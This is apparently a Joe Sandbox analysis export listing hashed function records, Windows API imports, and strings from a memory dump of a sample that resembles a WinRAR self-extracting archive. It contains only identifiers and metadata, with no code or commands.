                                                                                                                                                                          • Instruction ID: 7ef1720ece56d9b34aff9da24f7f63e2ecf6f925c372663054388971cab6ef8f
                                                                                                                                                                          • Opcode Fuzzy Hash: cd28e31d7d5d8dacbc8c1e36a10d9298773be20ef7319678f464fee92af96a22
                                                                                                                                                                          • Instruction Fuzzy Hash: B922E3B3B246508BD728CF25C89AE5E3766F798744B4B8228DF0ACB785DB39D505CB40
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c6c4f15c2075db455a8805df7f1b959bd99bc7369c78054583d6a965d91bd105
                                                                                                                                                                          • Instruction ID: bfdc1ed6f4540f971bd7dd9b985cf0ce416b7dc9e4c3d1b9c44a9a1ef614442f
                                                                                                                                                                          • Opcode Fuzzy Hash: c6c4f15c2075db455a8805df7f1b959bd99bc7369c78054583d6a965d91bd105
                                                                                                                                                                          • Instruction Fuzzy Hash: BFD1BB72A181D04EE312CB79A4144BEBFB5E71D30DB8A8262DFD55370AC62EE502DB60
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9782f85efb0ae2e1c0b67e86eaa04f67255253bd9529923cb00556c4c2cc06da
                                                                                                                                                                          • Instruction ID: 8f7d24f0737fef30bd8adb53bca6773bfc62a6023289d8f3244ce03951e30cf7
                                                                                                                                                                          • Opcode Fuzzy Hash: 9782f85efb0ae2e1c0b67e86eaa04f67255253bd9529923cb00556c4c2cc06da
                                                                                                                                                                          • Instruction Fuzzy Hash: CA612622B1C1D169EB01DF7589444FEBFB1AB097847868072DE9E5364ACB3EE905CB20
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 925daada8ef65e2677460b522fd56a987e460062fe4befbd33bf430193fcb847
• Instruction ID: 9051f866324078bf5e52c8bf55a2f270227988adbf360944197ff925f3b05a98
• Opcode Fuzzy Hash: 925daada8ef65e2677460b522fd56a987e460062fe4befbd33bf430193fcb847
• Instruction Fuzzy Hash: 2EF06275B282958BDBA89F39A842629B7D0FB08380F80907AD68D83B04DB3D94608F14
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 915a11522949b389e451a5ed0c02c5f26bdaa58b853bb1385cc96cba591218a7
• Instruction ID: c7ad701bee1651797137c5d3256a415a879d41a066132ebc663ad5dee9b33ce9
• Opcode Fuzzy Hash: 915a11522949b389e451a5ed0c02c5f26bdaa58b853bb1385cc96cba591218a7
• Instruction Fuzzy Hash: B6A0023591CD12E4E648AF00EC70135E330FF50700BD40032D44D820A1DF3DE440D360
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
• String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 2565136772-3242537097
• Opcode ID: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
• Instruction ID: c71835c6b17d8547a6f5a156224fc33aa498362e86fb3ed2a3b75460cda9349a
• Opcode Fuzzy Hash: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
• Instruction Fuzzy Hash: CC212A20E1DB07A5FE15BB61ECA4376E2A0EF44B40FC81036D90E436A1EF3DA4458360
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
• String ID: GETPASSWORD1$Software\WinRAR SFX
• API String ID: 431506467-1315819833
• Opcode ID: a5c5738898e15f6e19ffd60a10583bda7f1b196946b6e6664251b414cb79581e
• Instruction ID: a6af59bebb3c43c2ee1ec6b81dc4eb0a48cc1f8b46746ecc596faed9b367a538
• Opcode Fuzzy Hash: a5c5738898e15f6e19ffd60a10583bda7f1b196946b6e6664251b414cb79581e
• Instruction Fuzzy Hash: A9B1B162F19B82A9FB00EB64D8442AEB362EF45798F804235DA5C27BD9DF3DE445C314
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
• String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
• API String ID: 2868844859-1533471033
• Opcode ID: dbdbaf2d6a176f92c1fb144b878dc6d6ca85ac90d776e93b087ee90a44d95b63
• Instruction ID: 1c46e5e791914c21f7c09d37e379147537f3bed6ffaaee6161310309e7817772
• Opcode Fuzzy Hash: dbdbaf2d6a176f92c1fb144b878dc6d6ca85ac90d776e93b087ee90a44d95b63
• Instruction Fuzzy Hash: 4381B162F18A42A9FB00EBA5D8502EEB371AF44798F844235DE1D1779AEF3DD506C324
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
• API String ID: 3215553584-2617248754
• Opcode ID: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
• Instruction ID: 92b72b19d60502bbc536adfd2ca60d4321e22d7615bc974ffbe0379487cfbd86
• Opcode Fuzzy Hash: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
• Instruction Fuzzy Hash: 1041A932B09B4599EB10DB21E8517AD73A4EF08798F984136EE5C83B94DF39D025C350
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: Window$MessageObjectSend$ClassDeleteLongName
• String ID: STATIC
• API String ID: 2845197485-1882779555
• Opcode ID: a56abbe028ef3f0b7d15def6da20f662c50af87d749574eaec9b76d17f79dad6
• Instruction ID: b787971f36bdca13466dc612bd0396ef43d34fdb4661f32abdb4e6d351bf7bf7
• Opcode Fuzzy Hash: a56abbe028ef3f0b7d15def6da20f662c50af87d749574eaec9b76d17f79dad6
• Instruction Fuzzy Hash: E531A335B1864696EA24BB21ED647FAA3A1FF89BC4F840031DD4D077A5DF3DE4068720
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
• String ID: UNC$\\?\
• API String ID: 4097890229-253988292
• Opcode ID: 00252a679874104d1822cc98057d8594556e629aee441fe9c1d421cf9e6faeae
• Instruction ID: 797541aeb58f9d92b236b9b570930cf359bd29d55efdc5ad3431a652b5a07fb8
• Opcode Fuzzy Hash: 00252a679874104d1822cc98057d8594556e629aee441fe9c1d421cf9e6faeae
• Instruction Fuzzy Hash: C412DF23B0DB42A0EB14EB65E8541AEA371EF41B98F904232DA5D07BE9DF3ED545C360
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemTextWindow
                                                                                                                                                                          • String ID: LICENSEDLG
                                                                                                                                                                          • API String ID: 2478532303-2177901306
                                                                                                                                                                          • Opcode ID: 413809c6c529f907a05a51e37b96b30026af9f7a13d4bd8aebdb5ec3f6628f42
                                                                                                                                                                          • Instruction ID: 2d8b6a2bd7acc576d84d52189548211de0c5ab4fd239d50cf4163520d9593fc1
                                                                                                                                                                          • Opcode Fuzzy Hash: 413809c6c529f907a05a51e37b96b30026af9f7a13d4bd8aebdb5ec3f6628f42
                                                                                                                                                                          • Instruction Fuzzy Hash: 4741AC35F0865296FB24AB21ED443BAA7A2EF84BC4F844135DD0E07BA5CF3DA5468320
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                                                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                          • API String ID: 2915667086-2207617598
                                                                                                                                                                          • Opcode ID: af4e49dbb55579098516a92d52c0ddb0d0e089f7b74e7f5168f5122a97df5a7b
                                                                                                                                                                          • Instruction ID: 7485ec6b329ab0745144fce07e0537991bafdb392d10c581b8f121218facfa73
                                                                                                                                                                          • Opcode Fuzzy Hash: af4e49dbb55579098516a92d52c0ddb0d0e089f7b74e7f5168f5122a97df5a7b
                                                                                                                                                                          • Instruction Fuzzy Hash: D8317220E0DB4791FA14BB15AC502B6E7A4EF54B90FC91139D95E43BA4DF3EE841C320
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: $
                                                                                                                                                                          • API String ID: 3668304517-227171996
                                                                                                                                                                          • Opcode ID: cc90666c87694a805e4cb26fa89118b0cbad2d188fd07c00b7ebba12d4a88631
                                                                                                                                                                          • Instruction ID: 981295a9dbd636dd8447d9329b589b0f5328a06d62b61672e59250c601198c09
                                                                                                                                                                          • Opcode Fuzzy Hash: cc90666c87694a805e4cb26fa89118b0cbad2d188fd07c00b7ebba12d4a88631
                                                                                                                                                                          • Instruction Fuzzy Hash: 56F1F162F18B82A0EE00AB64D8445BEF321AF44BACF905231CA5D137D9DF7EE590D360
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                          • API String ID: 2940173790-393685449
                                                                                                                                                                          • Opcode ID: 7ce8224d02cbc9d10e697210102f736983d510ff4da2607681883173542701a8
                                                                                                                                                                          • Instruction ID: a327eaf77c73e6ec0b7751b9d6db1a115a9e187b0f8676d2678a9158885174f8
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ce8224d02cbc9d10e697210102f736983d510ff4da2607681883173542701a8
                                                                                                                                                                          • Instruction Fuzzy Hash: 1BE1B4339087829AEB14AF74D8903AEB7A0FF84748F944136EA8D57796CF39E485C710
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF70ECE0AA0: CompareStringW.KERNEL32(?,?,00007FF70ECD6C19), ref: 00007FF70ECE0ABF
                                                                                                                                                                            • Part of subcall function 00007FF70ECD12BC: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70ECD13B6
                                                                                                                                                                            • Part of subcall function 00007FF70ECE0AD0: CompareStringW.KERNEL32 ref: 00007FF70ECE0B36
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECE1DC2
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECE1DC8
                                                                                                                                                                          • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF70ECE1E25
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CompareString_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskswprintf
                                                                                                                                                                          • String ID: .zipx$.zx$z%s%02d
                                                                                                                                                                          • API String ID: 2859674139-515631857
                                                                                                                                                                          • Opcode ID: 2e8cc53fc1a399fcb678a14113de810c74ea7267c0bd574ae7842b24cd295462
                                                                                                                                                                          • Instruction ID: 8dce9b52980dd3dce5e13d6a589f529d3cb37f7085f17e26cb40c46184b6e47c
                                                                                                                                                                          • Opcode Fuzzy Hash: 2e8cc53fc1a399fcb678a14113de810c74ea7267c0bd574ae7842b24cd295462
                                                                                                                                                                          • Instruction Fuzzy Hash: F171D872A19741A8EB10EF64D8913EDB361EF44788F845232EA5C47B99DF39D654C310
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF70ECFAA83,?,?,?,00007FF70ECF87EE,?,?,?,00007FF70ECF87A9), ref: 00007FF70ECFA901
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000,00007FF70ECFAA83,?,?,?,00007FF70ECF87EE,?,?,?,00007FF70ECF87A9), ref: 00007FF70ECFA90F
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF70ECFAA83,?,?,?,00007FF70ECF87EE,?,?,?,00007FF70ECF87A9), ref: 00007FF70ECFA939
                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,00000000,00007FF70ECFAA83,?,?,?,00007FF70ECF87EE,?,?,?,00007FF70ECF87A9), ref: 00007FF70ECFA97F
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,00000000,00007FF70ECFAA83,?,?,?,00007FF70ECF87EE,?,?,?,00007FF70ECF87A9), ref: 00007FF70ECFA98B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                          • Opcode ID: 6c79a96e063dba16a1b32c7952d051ebac3d8e1187371194647d3fb8a0e2c012
                                                                                                                                                                          • Instruction ID: 8bdf261588a42b8bd931cefae444d1ad6ee965736555a7f4b9c9ca19e384be11
                                                                                                                                                                          • Opcode Fuzzy Hash: 6c79a96e063dba16a1b32c7952d051ebac3d8e1187371194647d3fb8a0e2c012
• Instruction Fuzzy Hash: D131C321A1E742A5EE15BB02AC1077AF3A5FF44B60F9A4536DD2D4B390DF3DE5448320
APIs
• GetModuleHandleW.KERNEL32(?,?,?,00007FF70ECF5003,?,?,?,00007FF70ECF53BA), ref: 00007FF70ECF50BB
• GetProcAddress.KERNEL32(?,?,?,00007FF70ECF5003,?,?,?,00007FF70ECF53BA), ref: 00007FF70ECF50D8
• GetProcAddress.KERNEL32(?,?,?,00007FF70ECF5003,?,?,?,00007FF70ECF53BA), ref: 00007FF70ECF50F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: d44736b24ca49afb9e39255391aa9d684b927709e013dababe23d1481c6dad27
• Instruction ID: 4999b05e7ddc8e615ef9983db8194625d3a8379883ce5b13231876cc6ef62edc
• Opcode Fuzzy Hash: d44736b24ca49afb9e39255391aa9d684b927709e013dababe23d1481c6dad27
• Instruction Fuzzy Hash: DB115E20B1DB03A2FD61AB11BD50276D2A2AF19781FC96435DA5D47794EF7DB8848330
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
